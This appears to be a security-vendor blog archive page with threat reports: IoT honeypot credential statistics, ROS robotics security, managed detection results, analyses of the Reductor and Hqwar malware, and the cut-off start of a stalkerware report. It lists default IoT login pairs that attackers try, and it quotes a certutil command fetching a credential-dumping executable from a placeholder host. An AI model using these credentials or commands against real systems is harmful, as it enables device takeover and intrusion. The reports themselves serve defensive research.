A constant issue for security researchers is new sources of malware, data and infections. As a company or security team, you want to have full visibility into what hosts are attacking you and what kind of services attackers are going after. Apart from traditional defense mechanisms, log monitoring and training, deploying honeypots in key parts of your public or private infrastructure can also help in identifying ongoing probes into your network.

The main issues when running a large network of honeypots is maintenance, aggregation and processing of logs and bug fixing. We solve these problems by moving all honeypots into a dockerized infrastructure. This means that the front-facing hosts require very low resources: a node can run on a Raspberry PI.

Our solution is simple: we offer Docker image/install scripts that forward malicious traffic aimed at “vulnerable” ports back to our infrastructure through a Wireguard UDP tunnel. We call these machines “nodes” and, as mentioned before, a node can even run on a Raspberry PI. Once you install a machine like that, all you need to do is redirect the ports you want to monitor towards it. You can directly assign public IPs, as some of our partners do, or even do DNAT (port forwarding) only for the ports you are interested in.

Once traffic hits your node, it is sent to our aggregator, where a Docker machine handles it and responds. We then generate statistics and all required data on the aggregator.

For more information about our infrastructure, please check out our SAS 2019 video.


While the trend for IoT-specific malware is growing as the IoT landscape expands into more and more areas, we will continue to extend our detection and research capabilities. Awareness is a key element along with defense technologies based on analysis and following trends.

One way to stay on top of attackers is to ingest dedicated feeds for IoT threats. For example, we offer such feeds on our Threat Intelligence platform.

If you are interested in starting a research partnership with Kaspersky and running honeypots on your unused IP addresses, please get in touch with us at honeypots@kaspersky.com. We are happy to partner with you to deploy our Honeypot-as-a-Service prototype.

As explained in the “Honeypots-as-a-Service” section, we aggregate, correlate and cluster all incoming connections and all processed data is made available to you almost in real time.


List of passwords for recent quarters:

Q3 2018 username password count support support 2627805 root vizxv 2376654 admin admin 2359985 root default 2355762 default S2fGqNFs 2140316 default OxhlwSG8 1683879 root xc3511 1451906 root anko 1365481 root 7ujMko0admin 1336390 root admin 1281745 root 12345 1273103 root password 1239467 user user 1238778 telnet telnet 1171306 root hunt5759 1136995 default <empty> 1058371 root root 995550 admin admin1234 977147 root 1001chin 932786 Q4 2018 username password count support support 703515 root vizxv 583926 admin admin 547302 root default 429091 default S2fGqNFs 423178 default OxhlwSG8 377638 root 7ujMko0admin 297929 telnet telnet 292827 root password 283462 root xc3511 281053 root 1001chin 276828 root 12345 273787 default <blank> 268606 root admin 264256 root hunt5759 258697 root anko 256498 user user 251272 guest 12345 246927 root root 218373 root <empty> 192910 Q1 2019 username password count support support 2627805 root vizxv 2376654 admin admin 2359985 root default 2355762 default S2fGqNFs 2140316 default OxhlwSG8 1683879 root xc3511 1451906 root anko 1365481 root 7ujMko0admin 1336390 root admin 1281745 root 12345 1273103 root password 1239467 user user 1238778 telnet telnet 1171306 root hunt5759 1136995 default <empty> 1058371 root root 995550 admin admin1234 977147 root 1001chin 932786 root <empty> 870276 Q2 2019 username password count default default 2523832 admin admin 2030987 root 7ujMko0admin 2023333 root vizxv 1842271 root default 1803912 admin password 1671593 default <blank> 1656853 default OxhlwSG8 1524072 default S2fGqNFs 1497600 root “taZz@23495859” 1402338 root zyad1234 1116542 admin aquario 1103479 default tlJwpbo6 1065423 admin admin123 1028715 guest 12345z 819617 guest 12345 757875 admin synnet 637017 guest guest 487789 guest <empty> 461508 guest 123456 460613 Q3 2019 username password count default default 4211802 admin admin 3692028 root vizxv 3174770 root default 3094578 root “taZz@23495859” 2964442 default <blank> 2897669 root tsgoingon 2341043 root 7ujMko0admin 2340426 admin aquario 2316776 admin admin123 2278549 admin password 2103600 default OxhlwSG8 2074258 default S2fGqNFs 1983527 default tlJwpbo6 1519887 guest 12345 1105911 guest 123456 991206 guest guest 937530 admin synnet 920939 guest admin 694245 guest <empty> 614275
2019. október 14.

A glimpse into the present state of security in robotics

 Download full report (PDF)

The world of today continues its progress toward higher digitalization and mobility. From developments in the Internet of Things (IoT) through augmented reality to Industry 4.0, whichrely on stronger automation and use of robots, all of these bring more efficiency to production processes and improves user experience across the globe. According to some estimates, these systems will become the norm in wealthy households before 2040.

Nowadays, however, these “robots” are not limited to futuristic humanoid machines. They include various devices, such as robot arms in factories or delivery robots, autonomous cars, automated baby sitters, etc.

Digitized systems of the future will involve deployable robotic systems in highly networked environments, remotely communicating with various services and systems for higher efficiency. While for now, this is only expected to happen, and we cannot talk about real truly functional deployable robotic systems, there are already certain developments in that area.

Robot Operating System

The research and development community, established around a shared interest in the future of robotics, initially required a unified and standard platform. To achieve that, back in 2007, Willow Garage introduced Robot Operating System (ROS), essentially a collection of middleware frameworks for robot software development, and a distributed system providing a mechanism for nodes to exchange information over a network. It operates like a service for distribution of data among various nodes in a system. A central master service is responsible for tracking published and subscribed topics, and provides a parameter server for nodes to store various metadata. Nodes can publish data as topics by advertising to the ROS master service. Other nodes can subscribe to these topics by querying the master, which provides the IP address and TCP port number of any nodes publishing a given topic, allowing the subscriber to contact the publishers directly to establish further connections. ROS has a distributed architecture: nodes can run on the same machine as the master, or on different machines. Apart from that, ROS possesses a number of ready-to-go libraries for solving various tasks, such as recognition of objects in an image or space mapping.

That said, ROS itself hardly can be positioned as a fully functional operating system—it is rather a set of open-source libraries that helps researchers and developers to visualize and record data, easily navigate the ROS package structures, and create scripts that automate complex configuration and setup processes.

Open source for study

ROS was designed with open source in mind—by a researcher, for researchers—with the intention of enabling users to choose the configuration of the tools and libraries that interacted with the core of ROS, so that the users could shift their software stacks to fit their robot or application area.

This open-source nature brings certain peculiarities into the subject of robotics’ cyber security. ROS is mainly used in research purposes: in the universities and by engineering enthusiasts. As with many other research platforms, the ROS designers made a conscious decision to exclude security mechanisms because they did not have a clear model of security threats and were not security experts themselves—and for the sake of research and development comfort and efficiency. For instance, the ROS master node trusts all nodes that connect to it, and thus should not be exposed to the Internet or any network with unauthorized users on it, without additional measures to restrict access to the system.

Overall, ROS has no built-in security; it lacks authentication, authorization and confidentiality features. Some of those issues have been addressed in ROS 2.0, a new version of ROS that is under heavy development and will take advantage of modern libraries and technologies for core ROS functionality, adding support for real-time code and embedded hardware. However, the second version is still not quite widely spread: the first version is sufficient for most researches, and more complex projects take a long time to migrate to an updated platform.


Nevertheless, ROS is expected to play an important role in robotics outside of pure research-oriented scenarios. And the significant security issues it bears should be addressed before ROS-based products like social robots, autonomous cars, etc. fly from university classrooms to reach mass markets.

By definition, networks are shared resources, so it is important to consider the security aspects of connecting systems using ROS, as a ROS master will by default respond to requests from any device on the network (or host) that can connect to it. Any host on the network can publish or subscribe topics, list or modify parameters, and so on.

In this regard, cyberattacks are a growing threat to the integrity of robotic systems at the core of this new emerging ecosystem. A robot can sense the physical world using sensors, or directly change the physical world with its actuators. Thus, a robot could leak sensitive information about its environment, such as data from sensors or cameras, if accessed by an unauthorized party, or even receive commands to move, which would create a both privacy and safety risk.

Initial studies have already validated the above consideration: in 2018, over 100 publicly accessible hosts running a ROS master node have been identified as part of analysis of the entire IPv4 address space of the Internet for instances of deployed ROS systems. Some of these appeared to be real robots, potentially exposed to either unauthorized publishing injections, or Denial of Service (DoS) attacks, or Unauthorized Data Access. This made robots potential targets, capable of being remotely moved in ways dangerous to both the robot and the objects around it.

But apart from technical aspect, there are more specific dimensions to be concerned about when it comes to robotics security. To find more in this regard, Kaspersky and the research team at the University of Ghent looked deeper into how the wide use of so-called “social robots” in the future could affect humans’ private lives, their social behavior and what the cyber security takeaways from this impact are.

It is our hope that this brief outline of robotics cybersecurity issues will encourage others to follow our example and bring about greater public and community awareness of the subject.

2019. október 8.

Managed Detection and Response analytics report, H1 2019

 Download full report (PDF)


This report contains the results of the Managed Detection and Response (MDR) service (brand name – Kaspersky Managed Protection). The MDR service provides managed threat hunting and initial incident response. Threat hunting is the practice of iteratively searching through data collected from sensors (referenced as telemetry or events) in order to detect threats that successfully evade automatic security solutions. A brief description of the service is provided at the end of this document.

The MDR service processes security operations events, focusing on and improving activity performed by professionals in charge of threat hunting projects, their level of expertise and the threat intelligence enabled through the detection process. According to David Bianco’s Pyramid of Pain, TTP-based threat detection is the most difficult type of indicators of attacks (IoAs) to circumvent for an adversary. The Kaspersky team is focused on TTP-based threat hunting in its MDR service, where humans are heavily involved to ensure the best judgments are made on collected events, especially advanced threats. This significantly augments automatic detection logic provided by endpoint protection products (EPP) used as sensors during the service delivery.

Life cycle of a threat hunting hypothesis

Geography and industry verticals of the MDR service delivered by Kaspersky

The analysis was conducted based on data from organizations around the world that used our service in the first half of 2019. Government bodies, financial institutions, industrial organizations, telecommunication and IT companies worldwide use our service to protect their IT infrastructure. Data from organizations that used our services for frequent health checks was also included.

Incident detection operations

Almost all alerts were generated by the analysis of events from endpoint sensors based on IoAs (TTP-based threat detection logic) and less than 2% of them were identified as cybersecurity incidents.

The low IoA conversion rate reflects the need to detect advanced threats which use a ‘living off the land’ approach, with behaviors that are very similar to legitimate activity. The more a malicious behavior mimics the normal behavior of users and administrators, the higher the rate of false positives and, consequently, the lower the conversion rate from alerts.

Mean time to response (MTTR)

(or incident processing time) is the time from an automatic alert generation as a result of automated analysis of events to its resolution by Kaspersky experts.

~25 mins average MTTR

It is worth noting that incident investigation may include additional work on the customer side or extra expert analysis and it may require more time for resolution – on average, up to 37 minutes in cases of incidents associated with advanced threats or sophisticated attack detection.

Examples of IoAs:
  • Start command line (or bat/PowerShell) script within a browser, office application or server application (such as SQL server, SQL server agent, nginx, JBoss, Tomcat, etc.);
  • Suspicious use of certutil for file download (example command: certutil -verifyctl -f -split https[:]//example.com/wce.exe);
  • File upload with BITS (Background Intelligent Transfer Service);
  • whoami command from SYSTEM account, and many others.
The main ideas behind IoA-TTP-based detection:
  • Applicable for detection of post-exploitation activity.
  • Detects standard but suspicious functionality of legitimate utilities: therefore, classification of observed behavior as malicious cannot be accomplished in a fully automated manner.
  • Tools used by attackers are not explicitly malicious, but their hostile usage is.
MTTR in view of incident severity

The incident processing time can is slightly depend on severity: incidents with a higher degree of severity require more complex and complicated analysis. They require more advanced remediation measures to cure infected systems and to protect against reoccurrence or threat propagation inside the network infrastructure than incidents with medium and low severity levels.

The MTTR values for incidents of different severity are provided below.

Incident prioritization

Incident severity is evaluated by experts based on a combination of factors, such as threat actor, attack stage at the time of incident detection (e.g. cyber kill chain), the scale of affected infrastructure, details about the threat and how it may be relevant to a customer’s business and, with the customer’s feedback, the identified impact on infrastructure, complexity of remediation measures and more. The severity levels are described below.

Incident details Severity level Typical remediation measures Action
(customer side)
Traces of targeted attack, unknown threat, complex malware or malware with fewer malicious actions. High Further investigation using digital forensic methods and manual remediation Urgent action from the technical specialists of the targeted organization is required Incident response New malware samples (Trojan, Cryptor, etc.) for which automatic remediation by product is technically possible.

Associated with minor damage to the affected systems. Medium Malware analysis None
(affected systems efficiently cured by EPP) Removal with EPP New samples of potential unwanted programs bringing inconvenience (Adware, Riskware, not-a-virus, etc.) for which automatic remediation by product is technically possible.

Associated with no damage to the affected systems. Low Removal with EPP

In the first half of 2019, we identified the following severity levels by month.

Things to note

Almost all incidents that have medium or low severity are connected to threats that can be efficiently remediated by endpoint protection products (EPP). No action from the side of the victim systems is required except for anti-malware database updates to EPPs to eliminate the risks associated with such incidents. This shows that an EPP is an effective threat response tool in the case of low and medium severity incidents, but it requires an additional level of TTP-based threat hunting, manual detection, and analysis to find new, unknown, or advanced threats.

Effectiveness of detection technologies Incident distribution by event source (sensors)

  • Almost half of all incidents were detected through the analysis of malicious actions or objects detected during the advanced analysis of endpoint behavior using TTP-based threat detection logic (using IoAs). This demonstrates the general efficiency of the endpoint IoA approach in detecting advanced threats and sophisticated malware-less attacks.
  • About one-third of all incidents were detected through the analysis of suspicious objects by the Advanced Sandbox component, which is usually connected with fraudulent email attachments that belong to various spam and phishing attacks targeting organizations all over the world. Detailed information on spam and phishing attacks in Q1 2019 was published on May 15, 2019 on Securelist.
Statistics on incident severity level distributed by detection technology Adversary tactics and techniques used in incidents

Kaspersky determines the adversary tactics and techniques related to alerts and cybersecurity incidents detected via TTP-based threat hunting (using IoAs) in accordance with MITRE’s globally accepted ATT&CK knowledge base.

Statistics on attack tactics used in incidents of different severity (high, medium, low) at the time of detection

The tactics are placed in Cyber Kill Chain order.

  • Cybersecurity incidents for almost all existing attack tactics were detected, which indicated the possibility of activity detection at all stages of potential hacker actions (no incidents with the Exfiltration tactic were implemented in the MDR service detection logic).
  • Detection of different ATT&CK tactics shows the ability to detect threats in the ‘post-breach’ attack stage when the intruders had already obtained access to the targeted systems, or even network infrastructure and were in the process of achieving attack objectives.
  • The statistics show the great importance of post-breach scenario detection in threat hunting combined with the classical pre-breach approach mainly implemented in preventive security controls. The better the threat is able to imitate legitimate activity, the greater its chances of avoiding detection before the actual compromise, which is very common for advanced malware-less threats.
Things to note
  • The greatest number of attacks were found at the Execution, Defense evasion, Lateral movement and Impact The tactics used during these stages are often considered the noisiest.
  • The significant number of Persistence detections demonstrate the importance of being able to detect this tactic’s techniques and procedures.
Effectiveness of MITRE ATT&CK in security operations

The technique conversion = # incidents associated with the technique / # alerts associated with the technique
The higher the conversion, the more alerts become cybersecurity incidents after analysis.

Technique frequency (among alerts generated via IoAs)

A large number of alerts associated with an attack technique generally result from its legitimate use in the analyzed infrastructure. This must be controlled properly, because it indicates potentially favorable conditions for conducting corresponding attacks.

It is highly important to determine whether behavior is normal for a particular IT infrastructure.

  • Having a baseline for what is normal activity in your IT infrastructure (efficient situational awareness) will help reduce false alerts for legitimate activity and raise the effectiveness of threat detection operations.

Detailed information on attack technique statistics, including telemetry required for detection of the corresponding cybersecurity incidents, is provided by link.

Kaspersky MDR service description Detection technologies Endpoint behavior analysis combined with analysis of metadata gathered via endpoint protection products (used as sensors) is performed by the means of:
  • TTP-based threat hunting (using IoAs)
  • SIEM rules for automatic events correlation (if a SIEM system is implemented in the IT infrastructure)
Other detection technologies:
  • Advanced Sandbox
  • Anti-Malware engine
  • Targeted Attack Analyzer
  • Network Traffic Analyzer (includes IDS)
  • YARA engine
Manual detection Customer requests Monitoring process

Real-time monitoring of network traffic combined with object sandboxing and endpoint behavior analysis delivers a detailed insight into what is happening across a business’s IT infrastructure. According to the global threat landscape and the use of TTP-based threat detection logic (using IoAs), correlation of events from multiple layers of IT infrastructure, including networks and endpoints, enables “near real-time” detection of complex threats as well as retrospective investigations.

2019. október 3.

COMpfun successor Reductor infects files on the fly to compromise TLS traffic

In April 2019, we discovered new malware that compromises encrypted web communications in an impressive way. Analysis of the malware allowed us to confirm that the operators have some control over the target’s network channel and could replace legitimate installers with infected ones on the fly. That places the actor in a very exclusive club, with capabilities that few other actors in the world have.

We called these new modules ‘Reductor’ after a .pdb path left in some samples. Besides typical RAT functions such as uploading, downloading and executing files, Reductor’s authors put a lot of effort into manipulating digital certificates and marking outbound TLS traffic with unique host-related identifiers.

The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we’re quite sure the new malware was developed by the COMPfun authors.

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn’t identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia, Kazakhstan and Belarus.

We registered two initial infection schemes: Reductor spreads by either infecting popular software distributions (Internet Downloader Manager, WinRAR, etc. and, for at least one victim, through a popular warez website over HTTP); or its decryptor/dropper is spread using COMpfun’s ability to download files on already infected hosts.

How to mark the TLS handshake without even touching the traffic

The malware adds digital certificates from its data section to the target host and allows the operators to add additional certificates remotely through a named pipe. The solution that Reductor’s developers found to mark TLS traffic is the most ingenious part. They don’t touch the network packets at all; instead developers analyzed the Firefox source code and Chrome binary code to patch the corresponding pseudo random number generation (PRNG) functions in the process’s memory.

Browsers use PRNG to generate the ‘client random’ sequence for the network packet at the very beginning of the TLS handshake. Reductor adds encrypted unique hardware- and software-based identifiers for the victims to this ‘client random’ field. In order to patch the system’s PRNG functions, the developers used a small embedded Intel instruction length disassembler.

In order to patch browser PRNG memory functions and add unique user IDs into the TLS handshake, the developers of Reductor had to analyze Firefox and Chrome code

Why we believe on-the-fly infection took place

As we don’t know what happens on the ‘server’ side, we can only rely on ‘client’ analysis. In order to distinguish handshakes of interest from all the TLS traffic, the campaign operators firstly have to decrypt this ‘client hello’ field. This means the campaign operators somehow need to have access to the target’s traffic.

The Reductor malware does not carry out a man-in-the-middle (MitM) attack itself. However, our initial thought was that the installed certificates may facilitate MitM attacks on TLS traffic; and the ‘client random’ field, with the unique ID in the handshake, would identify the traffic of interest. Later analysis provided even more basis for this idea.

We initially observed that infected installers were downloaded from HTTPS warez websites; but, as often happens, the files themselves were downloaded through unencrypted HTTP. This makes it technically possible to replace the files with malicious ones during the download process. Interestingly, the configuration data of some samples contained very popular legitimate websites. We really don’t think they were compromised to serve as control servers.

In any case, we didn´t initially know how the installers were infected, because the original downloaded files were no longer available for analysis on the warez websites. And there was always the possibility that the installers were infected on the website from which they were originally downloaded.

Then more recent Reductor telemetry gave us a clue. This time samples were again being downloaded from warez websites, but we were able to confirm that in this new case the original installers were not infected. This allowed us to confirm that Reductor’s operators have some control over the target’s network channel and could replace legitimate installers with infected ones on the fly.

Reductor features

The malware authors are creative and sometimes even seem to be having a bit of fun. For instance, one of the web domains they use for COMpfun (the publicly known name) is compfun[.]net. The domain-user-password triad hardcoded into the decryptor-dropper was “uac is useless”. Here’s a summary of the different types of campaign artifacts found:

Initial infection Escalation, detection avoidance Main payload Malware COMpfun Trojan Reductor dropper-decryptor Reductor Trojan Process One of the browsers Same browser lsass.exe Persistence COM CLSID hijacking Auxiliary module, N/A LSA notification package Net encryption AES 128 Local module, N/A AES 128 Host encryption Configuration data encrypted with one byte XOR and compressed with LZNT1 Reductor in resources encrypted with one byte XOR and compressed with LZNT1 Victims’ unique IDs in TLS ‘client hello’ encrypted using XOR with changing round key

As we have already mentioned, there are two different methods used by the attackers to spread Reductor. In the first scenario, the attackers use infected software installers with 32- and 64-bit versions of Reductor included. These installers may be for popular Internet Download Manager, Office Activator, etc.

In the second scenario, the targets are already infected with the COMpfun Trojan, which uses COM CLSID for persistence. After getting into the browser’s address space, the Trojan can receive the command to download additional modules from the C2. As a result, the target’s browser downloaded Reductor’s custom dropper-decryptor.

The coding style is quite distinctive throughout the modules. Take a look at them in the following table:

Feature Description Strings storage All the strings in use, such as function names for resolving dynamic addresses, are returned by the small functions. The developers probably implemented them using the C preprocessor #define directive. Function address dynamic resolution For every dynamic linked library in use, the developers implemented a standalone function and a custom structure to store the addresses of its functions for further use. Extensive use of custom structures The developers used custom structures for every task: C2 communication, thread synchronization, resolving of system function addresses, etc. System fingerprinting hashes inside TLS ‘client random’

As mentioned above, Reductor adds its own ‘victim id’ inside TLS packets. The first four-byte hash (cert_hash) is built using all of Reductor’s digital certificates. For each of them, the hash’s initial value is the X509 version number. Then they are sequentially XORed with all four-byte values from the serial number. All the counted hashes are XOR-ed with each other to build the final one. The operators know this value for every victim, because it’s built using their digital certificates.

The second four-byte hash (hwid_hash) is based on the target’s hardware properties: SMBIOS date and version, Video BIOS date and version and hard drive volume ID. The operators know this value for every victim because it’s used for the C2 communication protocol. The resulting custom 16-byte structure to spoof the originally PRNG-generated values looks like this:

struct client_hello_system_fingerprint { DWORD initial_xor_key; // First four bytes generated by original system PRNG function DWORD predefined_const; // Set to 0x45F2837D DWORD cert_hash; // Reductor's digital certificates hash DWORD hwid_hash // Target's hardware hash };

The latter three fields are encrypted using the first four bytes – initial PRN XOR key. At every round, the XOR key changes with the MUL 0x48C27395 MOD 0x7FFFFFFF algorithm. As a result, the bytes remain pseudo random, but with the unique host ID encrypted inside.

PRNG patching

The table below enumerates the patched auxiliary and PRNG system functions.

Library Patched function Features Auxiliary functions “ntdll.dll” RtlReleaseResource() Save auxiliary data like current thread ID and current tick count; memcpy() If “client hello” has to be copied, then count cert_hash and hwid_hash, change source bytes to encrypted client_hello_system_fingerprint structure and call original memcpy(); One of the C runtime libraries time64() Save time passed since 1 January 1970; “kernel32.dll” or “kernelbase.dll” GetSystemTimeAsFileTime() PRNG functions “nss3.dll” PK11_GenerateRandom() Call original PRNG function and generate initial XOR key from its result. Change PRNG result: set seventh byte to 1, then save 0x45F2837D, hwid and cert hashes. Encrypt the result and return it instead of the original PRN. It will affect calls to ssl3_SendClientHello() -> ssl3_GetNewRandom(ss->ssl3.hs.client_random); “advapi32.dll” CryptGenRandom() Spoof these system PRNG function results in similar way with some minor changes; “bcrypt.dll” BCryptGenRandom() “chrome.dll” PRNG function Find PRNG function by its binary code template and patch it like all the aforementioned. Firefox nss3.dll PK11_GenerateRandom() patching

Reductor patches nss3.dll for Firefox. This library’s source code is publicly available. PK11_GenerateRandom() is used in the /security/nss/lib/ssl/ssl3con.c in the ssl3_GetNewRandom() function. The SSL3_RANDOM_LENGTH constant is 32 bytes, so Reductor’s code changes all the results and the functions, which call to ssl3_GetNewRandom() will receive the modified random data with the encrypted target fingerprinting inside.

In this case, the caller function to ssl3_GetNewRandom(ss->ssl3.hs.client_random) is ssl3_SendClientHello() in order to generate the client random data for the initial communication handshake.

To affect the TLS handshake malware authors patched PK11_GenerateRandom() inside the Firefox process memory

Patching PK11_GenerateRandom() would also affect the generation of any 256-bit (32 bytes) initialization vector (IV) generation, for example, for AES 256 in ssl_SelfEncryptProtect() or other crypto functions in NSS libraries used by Firefox. From our point of view, this would be a side effect of Reductor with no additional purpose.

Installed digital certificates

Reductor samples hold DER-encoded root X509v3 certificates in the .data section to add on the target hosts. The malware is also able to get additional certificates from the operators through a named pipe.

Certificate SHA1 fingerprint CA for root cert Valid till (GMT) 119B2BE9C17D8C7C5AB0FA1A17AAF69082BAB21D ie-paypal 2031.11.17 22:56:10 546F7A565920AEB0021A1D05525FF0B3DF51D020 GeoTrust Rsa CA 2031.11.17 22:56:10 959EB6C7F45B7C5C761D5B758E65D9EF7EA20CF3 GeoTrust Rsa CA 2031.11.17 22:56:10 992BACE0BC815E43626D59D790CEF50907C6EA9B VeriSign, Inc. 2031.11.17 22:56:10

One of the decoded CA X509v3 certificates inside the Reductor malware

C2 communication

All C2 communications are handled in a standalone malware thread. Reductor sends HTTP POST queries to the /query.php scripts on the C2s listed in its configuration. The POST query contains the target’s unique hardware ID encrypted with AES 128. The C2 returns one of the following encrypted commands.

C2 command Features hostinfo Get the host name gettimeout Get the timeout value from the corresponding registry value options Parse strings and set corresponding values in the system registries. So far only one option is supported – timeout domainlist Transmit the current C2 domains used by target downfile Download the file of interest upfile Upload the file of interest execfile Create the process that executes mentioned file nop Do nothing. Possibly used to check the connection with the host kill Delete installed digital certificates, files, cookies and system registry values including those related to COM CLSID or LSA notification package persistence deletefile Delete file at a specified path certlist Renew the digital certificates installed on target Conclusions

Turla has in the past shown many innovative ways to accomplish its goals, such as using hijacked satellite infrastructure[2]. This time, if we’re right that Turla is the actor behind this new wave of attacks, then with Reductor it has implemented a very interesting way to mark a host’s encrypted TLS traffic by patching the browser without parsing network packets. The victimology for this new campaign aligns with previous Turla interests.

We didn’t observe any MitM functionality in the analyzed malware samples. However, Reductor is able to install digital certificates and mark the targets’ TLS traffic. It uses infected installers for initial infection through HTTP downloads from warez websites. The fact the original files on these sites are not infected also points to evidence of subsequent traffic manipulation.

File Hashes
  • 27CE434AD1E240075C48A51722F8E87F
  • 4E02B1B1D32E23975F496D1D1E0EB7A6
  • 518AB503808E747C5D0DDE6BFB54B95A
  • 7911F8D717DC9D7A78D99E687A12D7AD
  • 9C7E50E7CE36C1B7D8CA2AF2082F4CD5
  • A0387665FE7E006B5233C66F6BD5BB9D
  • F6CAA1BFCCA872F0CBE2E7346B006AB4
Domains and IPs
  • adstat.pw
  • bill-tat.pw
2019. október 2.

HQWar: the higher it flies, the harder it drops

Mobile dropper Trojans are one of today’s most rapidly growing classes of malware. In Q1 2019, droppers are in the 2nd or 3rd position in terms of share of total detected threats, while holding nearly half of all Top 20 places in 2018. Since the droppers’ main task is to deliver payload while sidestepping the protective barriers, and their developers are fully bent on countering detection, this is probably one of the most dangerous classes of malware.

One of the most dangerous and widely spread families of Trojan droppers is Trojan-Dropper.AndroidOS.Hqwar. Originally created as a MaaS infrastructure, today Hqwar is used for both small-scale attacks and big ones affecting thousands of users all over the world.

The very first versions of Hqwar saw the light in early 2016, getting quite popular by the end of the same year. It peaked in Q3 2018, when substantial numbers of financial malware payloads would come “packaged” with this dropper. Yet, beginning Q4 2018, we observe its decline. The likely reason is the tool is not updated frequently enough by its author, causing a customer outflow.

Number of Hqwar detections by unique users

The very first Trojan packed with Hqwar was a piece of ransomware targeting Russian users. This is how this disgrace introduced itself to the victims, impersonating the Ministry of Internal Affairs (note that Hqwar was built by a Russian-speaking author, and many of its clients prey on Russian users):

Now one can say that only the lazy did not use Hqwar: Kaspersky’s collection of viruses features over 200,000 Trojans packed using Hqwar. When decrypting and unpacking these malicious objects, we found that almost 80% of them are financial threats, while nearly one third represent the banking Trojan family of Faketoken. In fact, it was the first ever banking Trojan whose authors began using Hqwar.

The Top 10 list of payloads most often bundled with Hqwar features such widely distributed Trojans as Asacub, Marcher and Svpeng. On several occasions, the dropper was carrying Korean bankers of the Wroba family and such famous SMS Trojans as Opfake and Fakeinst. But their authors seem to have used Hqwar just to try things out, so to speak: these “matryoshkas” did not gain much popularity. All in all, we know of 22 families of different Trojans packed with Hqwar, which shows how much interest cybercriminals take in droppers.

Family %* 1 HEUR:Trojan-Banker.AndroidOS.Faketoken 28.81% 2 HEUR:Trojan.AndroidOS.Boogr 14.53% 3 HEUR:Trojan-Banker.AndroidOS.Asacub 10.10% 4 HEUR:Trojan-Banker.AndroidOS.Marcher 8.44% 5 HEUR:Trojan-Banker.AndroidOS.Grapereh 7.67% 6 HEUR:Trojan-Spy.AndroidOS.SmsThief 7.20% 7 HEUR:Trojan-Banker.AndroidOS.Gugi 6.18% 8 HEUR:Trojan-Banker.AndroidOS.Svpeng 5.38% 9 HEUR:Trojan-Banker.AndroidOS.Agent 5.24% 10 HEUR:Trojan-Banker.AndroidOS.Palp 1.97%

* percentage of all unpacked objects

What’s inside

From the technical viewpoint, the dropper is a wrapper around the payload’s DEX file to be decrypted and loaded, comprising two classes.

Decompiled dropper with two classes

If we are to simplify and forget about obfuscation, the dropper’s workflow can be presented as follows:

  • open a file from assets;
  • decrypt it using RC4 and a hardwired key;
  • delegate control with the help of DexClas`sLoader LoadClass.

Everything the unpacked Trojan needs to operate is in the dropper’s APK file: all activity, receiver and service records are written down in the manifest, the pictures are where they should be (with unique names generated for all objects). As Hqwar doesn’t “drop” the APK file but only loads the code, there is no need for an app installation request which can potentially be declined by the user (however, this approach is not exactly good for persistency: once the dropper is deleted by the user, the Trojan is deleted, too). The main Trojan’s body is obfuscated, so the original malware cannot be recognized.

Interesting fact: for some time Hqwar had co-existed with a Trojan called Trojan-SMS.AndroidOS.Fakeinst.hq, with which it had quite a few things in common:

  • The two used similar line obfuscation methods (it might be that the authors of both had used a ready-made decryption algorithm).

A portion of line decryption code from Hqwar (left) and Fakeinst.hq (right)

  • A setup was used in which a portion of code was loaded from AES-encrypted asset files. It is worth noting that in Fakeinst.hq one of the encrypted files was an APK file, while the other one was a DEX file used to install a secondary APK (payload). This made for a triple matryoshka: the original dropper at level one, an encrypted DEX file at level two, and an encrypted APK at three. This was done to preserve infection after the dropper itself was deleted. Broadly speaking, the trick is not new, but unlike other similar occasions, Hqwar and Fakeinst.hq used encrypted files with the same extension – DAT.

Encrypted files in Fakeinst.hq

Encrypted file from Hqwar

  • In both cases, a similar certificate generation pattern was used:

Certificate from Fakeinst.hq

Certificate from Hqwar

This evidence proves nothing, of course. But it can be assumed that the author of Hqwar had begun with Russian SMS Trojans, while at the same time working on the “wrapper” infrastructure.


Hqwar owns its popularity to convenient infrastructure and pricing policy (as well as the fact that its maker is still at large and has no fear of being called to account for his actions).

Advertisement of the service

An API exists to have the malware mass-produced. It is likely used by the makers of Trojans like Faketoken, Asacub, Marcher, etc.:

The need to have a certificate for each APK file is one of the places that could give one “a foothold” in Hqwar to reconstruct the certificate generation system. Therefore, the author has made it possible to load a random certificate – either stolen or from a legitimate application.


Despite all the convenient features the dropper’s author has built into it, we believe Hqwar (and similar wrappers) may soon lose much of their popularity: their counter-detection mechanisms have become obsolete, while the structure of the APK file implies there are places that cannot be “littered”, allowing for timely detection of threats (exactly what Kaspersky’s protective solutions are for).

2019. október 2.

The State of Stalkerware in 2019

Introduction and methodology

Six months ago, we created a special alert that notifies users about commercial spyware (stalkerware) products installed on their phones. This report examines the use of stalkerware and the number of users affected by this software in the first eight months of 2019.

Сonsumer surveillance technology has evolved rapidly in recent years and the very purpose of surveillance activity has changed dramatically. The rise of the internet and subsequent explosion in mobile device usage has led to a thriving type of surveillance software – known as stalkerware. The software allows users to spy on other people – for example, to monitor their messages, call information and GPS locations – in complete stealth. It can often be used to abuse the privacy of current or former partners and even strangers. This can be done by simply manually installing an application on the targeted victim’s smartphone or tablet. Once in place, the stalker receives access to a range of personal data, despite being remote from the victim. It differs greatly from parental control software. While parental control apps aim to restrict access to risky and inappropriate content and persistently notifies a user about its requests, stalkerware is about providing the abuser with surveillance to spy on a victim, without the consent of an individual.

The vast majority of stalkerware apps are not available on official app stores – like Google Play – and installation requires access to a dedicated website and access to the victim’s device. Those with bad intentions may use it to monitor employee emails, track children’s movements and even spy on what a partner is up to. Such uses may lead to harassment, surveillance without consent, stalking and even domestic violence. However, current laws to regulate the use of stalkerware are not yet strong enough to deter culprits from abusing and taking advantage of other people.

The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network, to measure how often and how many users encountered stalkerware threats in the first eight months of 2019, compared to what was found last year. The Kaspersky Security Network is the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. In this blog, we have explored why stalkerware is being used and where it is implemented most prolifically.

Main findings
